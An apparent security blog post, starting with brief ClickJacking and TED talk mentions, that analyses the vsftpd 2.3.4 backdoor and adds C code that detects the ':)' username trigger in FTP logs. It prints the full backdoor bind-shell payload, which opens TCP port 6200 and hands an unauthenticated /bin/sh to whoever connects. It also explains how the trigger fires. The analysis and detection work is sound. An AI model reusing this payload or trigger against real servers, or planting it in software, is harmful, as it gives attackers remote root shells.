After coming across a couple of news sites reporting on ClickJacking this afternoon, I decided to create a post that would demonstrate just how easily ClickJacking is done. Please be aware that this post is very high level, and not an in-depth look at the attack vector. The hope for this post is that you can demonstrate to your friends / family just how easy it is to be caught out.
For those who haven’t seen it, Mikko Hypponen (of F-Secure AntiVirus) has given a talk at TED about the future of security on the internet.
It’s an entertaining look into the world of antivirus research, with elements from malware history, as well as an interesting look at the stupidity of some malware creators.
Now if you are established in the computer security scene, you are not likely to learn anything technical from this talk, but what I enjoyed was Mikko’s enthusiasm in his pursuit of protecting the Internet.
The talk can be found at TED here
As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.
The backdoor trigger was planted in ‘str.c’:
The added check looks for two consecutive bytes, 0x3a and 0x29, or ‘:)’ for those who don’t like ASCII, in the string being scanned, and calls vsf_sysutil_extra() when it finds them. The scan runs over the username sent in the FTP USER command, so a username containing ‘:)’ fires the trigger before any password is checked and without needing a valid account.
vsf_sysutil_extra() is then added to sysdeputil.c as:
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
int vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1);                            /* a failed socket() simply kills the FTP session */
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);          /* TCP 6200, bound on every interface */
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  {
    rfd = accept(fd, 0, 0);           /* no authentication of the peer at all */
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);   /* wire the socket to stdin/stdout/stderr */
    execl("/bin/sh","sh",(char *)0);  /* the shell replaces the vsftpd process image */
  }
}
Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. It binds TCP port 6200 on all interfaces, waits for a connection, redirects stdin, stdout and stderr of the vsftpd process to the accepted socket and exec()s /bin/sh, so whoever connects gets an unauthenticated shell with the privileges of that process (root, in the cases that were reported). Note that the loop only matters if execl() fails: once the shell starts, the vsftpd process image is gone. It also means that on a host where port 6200 is already taken, or is firewalled, the trigger kills the FTP session (exit(1)) rather than handing out a shell, which is the one thing that makes the payload noticeable.
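To make the trigger condition concrete, here is an added example (not code from the vsftpd-2.3.4 tarball or from this post) that reimplements the str.c check as a stand-alone function and then runs it over FTP command log lines, the way a SOC would look for attempts against this backdoor. The function names and the log line format are assumptions of this example: the sample lines are constructed, loosely modelled on what vsftpd writes with log_ftp_protocol enabled, and are not copied from a real log.

```c
/* Added example: the vsftpd-2.3.4 backdoor trigger, reimplemented as a
 * standalone check, plus a small detector over FTP command log lines.
 * Function names and the log line format are assumptions of this example. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Mirrors the str.c trigger: any adjacent byte pair 0x3a 0x29 (":") then
 * ")") anywhere in the buffer fires the backdoor.  The loop bound is
 * tightened to i + 1 < len so the check never reads past the buffer;
 * the original relied on the string's NUL terminator for the last byte. */
int vsftpd_trigger_present(const char *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i++) {
        if ((unsigned char)buf[i] == 0x3a &&
            (unsigned char)buf[i + 1] == 0x29) {
            return 1;
        }
    }
    return 0;
}

/* Return a pointer to the argument of a "USER ..." FTP command inside one
 * logged line, or NULL if the line carries no USER command. */
static const char *user_argument(const char *line)
{
    const char *p = strstr(line, "USER ");
    return p ? p + 5 : NULL;
}

/* Count log lines whose USER argument would fire the trigger.
 * 'lines' is a NULL-terminated array of C strings. */
int count_trigger_attempts(const char *const *lines)
{
    int hits = 0;
    for (; *lines; lines++) {
        const char *arg = user_argument(*lines);
        if (arg && vsftpd_trigger_present(arg, strlen(arg)))
            hits++;
    }
    return hits;
}

/* Constructed sample lines (not a real log).  The third line is the
 * classic trigger; the last one has ':' and ')' but not adjacent, so it
 * must not count. */
static const char *const sample_log[] = {
    "Tue Jul  5 22:46:18 2011 [pid 2] FTP command: Client \"10.0.0.5\", \"USER anonymous\"",
    "Tue Jul  5 22:46:19 2011 [pid 2] FTP command: Client \"10.0.0.5\", \"PASS <password>\"",
    "Tue Jul  5 22:47:02 2011 [pid 3] FTP command: Client \"10.0.0.9\", \"USER test:)\"",
    "Tue Jul  5 22:47:03 2011 [pid 3] FTP command: Client \"10.0.0.9\", \"PASS <password>\"",
    "Tue Jul  5 22:48:10 2011 [pid 4] FTP command: Client \"10.0.0.7\", \"USER a:b)\"",
    NULL
};

int main(void)
{
    printf("trigger attempts in sample log: %d\n",
           count_trigger_attempts(sample_log));
    return 0;
}
```

The detector deliberately checks the raw USER argument rather than the username the server would accept: the backdoor fires on the bytes of the command before authentication, so an attempt against a non-existent account (test:) above) is still an attempt, and a ':' and ')' that are not adjacent are not. If you keep vsftpd protocol logging on, a USER argument containing ':)' followed by a new TCP session to port 6200 from the same client is the whole attack, and both halves are visible.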